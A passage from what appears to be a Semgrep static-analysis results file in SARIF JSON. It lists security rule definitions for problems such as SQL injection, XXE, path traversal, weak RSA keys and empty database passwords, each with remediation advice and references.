no scheme is specified, nginx will forward the request with the incoming scheme. This could result in unencrypted communications. To fix this, include the 'https' scheme."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.insecure-redirect.insecure-redirect","id":"generic.nginx.security.insecure-redirect.insecure-redirect","name":"generic.nginx.security.insecure-redirect.insecure-redirect","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.insecure-redirect.insecure-redirect"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"help":{"markdown":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded](https://wiki.sei.cmu.edu/confluence/display/cplusplus/MSC51-CPP.+Ensure+your+random+number+generator+is+properly+seeded)\n","text":"The seed value of a Pseudo Random Number Generator (PRNG) is directly derived from the time, which is highly predictable. Do not use values from this PRNG to derive a secrets, such as passwords or cryptographic keys."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","id":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","name":"cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time","properties":{"precision":"very-high","tags":["CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.rng.predictable-seed-rng-time.predictable-seed-rng-time"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","id":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","name":"python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.tormysql.python-tormysql-empty-password.python-tormysql-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"help":{"markdown":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/key_vault#network_acls)\n - [https://docs.microsoft.com/en-us/azure/key-vault/general/network-security](https://docs.microsoft.com/en-us/azure/key-vault/general/network-security)\n","text":"Network ACLs allow you to reduce your exposure to risk by limiting what can access your key vault. The default action of the Network ACL should be set to deny for when IPs are not matched. Azure services can be allowed to bypass."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","id":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","name":"terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.keyvault.keyvault-specify-network-acl.keyvault-specify-network-acl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"help":{"markdown":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings)\n - [https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies](https://docs.microsoft.com/en-us/aspnet/web-api/overview/advanced/http-cookies)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.formsauthentication.requiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_FormsAuthentication_RequireSSL)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL](https://docs.microsoft.com/en-us/dotnet/api/system.web.security.roles.cookierequiressl?redirectedfrom=MSDN&view=netframework-4.8#System_Web_Security_Roles_CookieRequireSSL)\n","text":"Cookie Secure flag is explicitly disabled. You should enforce this value to avoid accidentally presenting sensitive cookie values over plaintext HTTP connections."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","id":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","name":"csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.web-config-insecure-cookie-settings.web-config-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"help":{"markdown":"RSA keys should be at least 2048 bits based on NIST recommendation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#algorithms)\n","text":"RSA keys should be at least 2048 bits based on NIST recommendation."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","id":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","name":"java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-rsa.use-of-weak-rsa-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"help":{"markdown":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root)\n - [https://github.com/hadolint/hadolint/wiki/DL3002](https://github.com/hadolint/hadolint/wiki/DL3002)\n","text":"The last user in the container is 'root'. This is a security hazard because if an attacker gains control of the container they will have root access. Switch back to another user after running commands as 'root'."},"helpUri":"https://semgrep.dev/r/dockerfile.security.last-user-is-root.last-user-is-root","id":"dockerfile.security.last-user-is-root.last-user-is-root","name":"dockerfile.security.last-user-is-root.last-user-is-root","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.last-user-is-root.last-user-is-root"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"help":{"markdown":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - [https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df](https://shirazkhan030.medium.com/biometric-authentication-in-ios-6c53c54f17df)\n","text":"The application was observed to leverage biometrics via Local Authentication, which returns a simple boolean result for authentication. This design is subject to bypass with runtime tampering tools such as Frida, Substrate, and others. Although this is limited to rooted (jailbroken) devices, consider implementing biometric authentication the reliable way - via Keychain Services."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.local-biometrics.insecure-biometrics","id":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","name":"swift.biometrics-and-auth.local-biometrics.insecure-biometrics","properties":{"precision":"very-high","tags":["CWE-305: Authentication Bypass by Primary Weakness","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.local-biometrics.insecure-biometrics"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec)\n - [https://guides.rubyonrails.org/security.html#command-line-injection](https://guides.rubyonrails.org/security.html#command-line-injection)\n","text":"Detected non-static command inside $EXEC. Audit the input to '$EXEC'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-exec.dangerous-exec","id":"ruby.lang.security.dangerous-exec.dangerous-exec","name":"ruby.lang.security.dangerous-exec.dangerous-exec","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-exec.dangerous-exec"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Cannot determine what '$UNK' is and it is used with a ' which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"help":{"markdown":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss)\n - [https://owasp.org/www-community/attacks/DOM_Based_XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS)\n","text":"Detected possible DOM-based XSS. This occurs because a portion of the URL is being used to construct an element added directly to the page. For example, a malicious actor could send someone a link like this: http://www.some.site/page.html?default= which would add the script to the page. Consider allowlisting appropriate values or using an approach which does not involve the URL."},"helpUri":"https://semgrep.dev/r/javascript.browser.security.dom-based-xss.dom-based-xss","id":"javascript.browser.security.dom-based-xss.dom-based-xss","name":"javascript.browser.security.dom-based-xss.dom-based-xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.dom-based-xss.dom-based-xss"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"help":{"markdown":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request)\n - [https://cwe.mitre.org/data/definitions/95.html](https://cwe.mitre.org/data/definitions/95.html)\n","text":"Passing unsanitized user input to a Script Engine or other means of dynamic code evaluation is unsafe. This could lead to code injection with data leakage or arbitrary code execution as a result. Avoid this, or use proper sandboxing if user code evaluation is intended."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","id":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","name":"java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-code-injection-from-http-request.tainted-code-injection-from-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.rocket.sql.sqlx-taint.sqlx-taint","id":"rust.rocket.sql.sqlx-taint.sqlx-taint","name":"rust.rocket.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","id":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","name":"rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-empty-password.pg-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"help":{"markdown":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"These permissions `$BITS` are widely permissive and grant access to more people than may be necessary. A good default is `0o644` which gives read and write access to yourself and read access to everyone else."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","id":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","name":"python.lang.security.audit.insecure-file-permissions.insecure-file-permissions","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-file-permissions.insecure-file-permissions"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.sqlite-express.sqlite-express","id":"javascript.express.db.sqlite-express.sqlite-express","name":"javascript.express.db.sqlite-express.sqlite-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.sqlite-express.sqlite-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"help":{"markdown":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls)\n - [https://golang.org/pkg/net/http/#ListenAndServeTLS](https://golang.org/pkg/net/http/#ListenAndServeTLS)\n","text":"Found an HTTP server without TLS. Use 'http.ListenAndServeTLS' instead. See https://golang.org/pkg/net/http/#ListenAndServeTLS for more information."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.use-tls.use-tls","id":"go.lang.security.audit.net.use-tls.use-tls","name":"go.lang.security.audit.net.use-tls.use-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.use-tls.use-tls"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","id":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","name":"python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-path-traversal-stdlib-flask.tainted-path-traversal-stdlib-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setExpandEntityReferences(false)` `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.documentbuilderfactory-xxe.documentbuilderfactory-xxe)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - 